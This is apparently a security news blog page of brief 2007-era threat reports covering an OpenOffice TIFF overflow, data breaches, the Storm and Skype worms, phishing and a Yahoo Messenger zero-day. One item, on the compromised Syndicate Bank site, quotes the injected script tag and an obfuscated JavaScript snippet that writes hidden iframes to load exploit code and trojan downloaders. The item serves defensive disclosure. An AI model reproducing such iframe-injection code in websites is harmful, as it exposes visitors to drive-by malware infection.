OpenOffice 2 TIFF Parsing Integer Overflow Vulnerabilities

1821 Comments Off

Description:
Some vulnerabilities have been reported in OpenOffice, which potentially can be exploited by malicious people to compromise a user’s system.

The vulnerabilities are caused due to integer overflows when processing certain tags within TIFF images. This can be exploited to cause heap-based buffer overflows by e.g. tricking a user into opening a specially crafted document.

Successful exploitation may allow the execution of arbitrary code.

The vulnerabilities are reported in versions prior to 2.3.

Solution:
Update to version 2.3.

http://secunia.com/advisories/26816/ 

Hacker Gained Access To Data On Millions Of TD Ameritrade Customers

1821 Comments Off

Online brokerage TD Ameritrade Holding Corp. announced today that a hacker broke into one of its databases and stole personally identifying information for some of its 6.3 million customers.

An online advisory and letters to account holders disclosed that names, e-mail addresses, phone numbers and home addresses were taken in the data breach. Client assets, along with user IDs, personal identification numbers and passwords, were not stored in the compromised database.

Full Story at informationweek.com 

 

Windows worm targets Skype users

1821 Comments Off

An instant-messaging worm has started spreading to PCs running Windows by using Skype to chat up potential victims in an attempt to convince them to download and run the malicious software.

The worm, described in a blog post written by eBay’s Skype subsidiary, can converse with victims in at least three different languages: Latvian, Russian, and English. Antivirus firms and eBay have already assigned a plethora of names to the digital pest, including Ramex (Skype), Pykspa (Symantec), Skipi (F-Secure), and Pykse (McAfee and others).

http://www.securityfocus.com/brief/586 

 

Custom-built botnet steals eBay accounts

1821 Comments Off

Online auction site eBay has been targeted by identity thieves, who are wielding a botnet that uses brute force to uncover valid account login info, an Israeli security company said Monday.

The attacks against eBay may have started as long ago as early August, said Ofer Elzam, of Aladdin Knowledge Systems Ltd. Elzam and his researchers have not been successful in notifying eBay of their weekend findings.

According to Elzam, the product manager of Aladdin’s eSafe threat protection line, the brute force attacks are launched by a large botnet that the identity thieves have built using a sophisticated, multi-stage campaign that begins with compromised legitimate Web sites.

Story continues at computerworld.com 

 

Better Business Bureau Scam Updated

1821 Comments Off

Websense┬« Security Labs(TM) has received reports of a new variant of an email attack that was originally launched early this year. The spoofed email purports to be from the Better Business Bureau (BBB). The message claims that a complaint has been filed against the recipient’s company.

Previously, the email attack contained an attachment that the victim would need to open in order to become infected. The new variant is slightly different.

The new message uses a tactic employed by other, more-successful email attacks, such as the recent Storm worm. Instead of including an attachment in the email, the body of the email contains a link to an external Web site from which the payload is downloaded if the link is accessed. This method allows the attack to bypass many attachment filters at the email gateway.

Link to our previous BBB alert:
http://www.websense.com/securitylabs/alerts/alert.php?AlertID=777

Details … 

Storm adds YouTube lures

1821 Comments Off

The Storm Trojan / Bot continues to spread and is now using a YouTube video to lure users. The latest version has a variety of subjects and email bodies but now uses the filename video.exe.



Email subject example: Sheesh man what are you thinkin.





Upon connecting to the URL, which is referenced as a YouTube link but is actually a Storm IP, the same exploit code used in past attacks attempts to run. As in the past if users are not vulnerable they will get a page displayed that  requests they run the code manually such as in the screenshot below:



 Websense Alert

 

Attackers probing for vulnerable Windows servers

1821 Comments Off

Attackers are probing for Windows servers running Trend Micro Inc.‘s ServerProtect antivirus software, researchers warned.

Early today, Symantec Corp.‘s DeepSight threat network monitored a major spike in traffic over TCP port 5168, which is related to the remote procedure call service in ServerProtect. “This may indicate an ongoing mass-scanning and exploitation attempt trying to exploit vulnerable systems for the newly disclosed vulnerabilities,” said Symantec analyst Pukhraj Singh in an alert issued to corporate customers.

Continues at computerworld.com 

 

Syndicate Bank site compromised

1821 Comments Off

Websense® Security LabsT has discovered that the official site for Indian Syndicate Bank (www.syndicatebank.in), was compromised with a malicious script that attempts to exploit multiple vulnerabilities. When customers visit the web site, a malicious JavaScript file (e.js) is executed and creates two additional iframes in the page.

<script src=http://< URL REMOVED >/e.js></script>

Snippet of js code:

document.writeln(“\/\/xxxx mca By Mr.0wen\/\/”);
document.writeln(“document.write(unescape(\”%3CIFraMe < URL REMOVED >IFraMe < URL REMOVED >wIdth%3D%220%22%20heIght%3D

%220%22%20FraMebOrder %3D%220%22%3E%3C\/IFraMe%3E\”));”);
document.writeln(“\/\/xxxx mca By Mr.0wen\/\/”);

The JavaScript from e.js (seen above) creates two new IFRAME elements within the page. One IFRAME attempts to load exploit code and the other creates several additional IFRAMEs that contain advertisement-related content. The exploit will try to load a Trojan Downloader (qq.exe) which will contact a remote server to download the following Trojan Downloader and Backdoor:

http://< URL REMOVED >/hxw/hx/200512.exe
http://< URL REMOVED >/hxw/hx/dd.exe

The site appears to have been cleaned a few hours ago.
 

Zero-Day Bug In Yahoo Messenger Pops Up

1821 Comments Off

Researchers at McAfee are reporting that they’ve reproduced a reported zero-day vulnerability in the Yahoo Messenger Webcam.

Karthik Raman, a researcher with McAfee, first reported on a Tuesday blog entry that Chinese researchers were claiming to have found a zero-day bug in Yahoo Messenger. On Wednesday, Raman’s fellow McAfee researcher Wei Wang, noted in a blog entry that they have been able to reproduce the vulnerability on Messenger V8.1.0.413.

Continues at informationweek.com 

Storm Warning: Worm Threat Escalates

1821 Comments Off

The Storm worm has grown into an online siege 10 times larger than any other e-mail attack in the last two years, amassing a botnet of nearly 2 million computers, with worrying implications, researchers say.


Before Storm, an average day saw about 1 million virus-laden e-mails crossing the Internet, says Adam Swidler, senior manager of software security firm Postini. On July 24, researchers tracked 46.2 million malicious messages, more than 99% of them from the Storm worm.


The number of zombie computers the Storm worm authors have amassed has skyrocketed in the past two months, says SecureWorks senior researcher Joe Stewart. From the first of January to the end of May, there were 2,815 bots launching Storm attacks. By the end of July, that number had leaped to 1.7 million. “It’s been building with exponential growth,” says Stewart. “It’s one of the largest botnets I’ve ever heard of.”

Continues at informationweek.com 

 


© 2014 DP's Security Bits.
WordPress Theme & Icons by N.Design Studio. Provided by WPMU DEV -The WordPress Experts   Hosted by Microsoft MVPs
Entries RSS Comments RSS Log in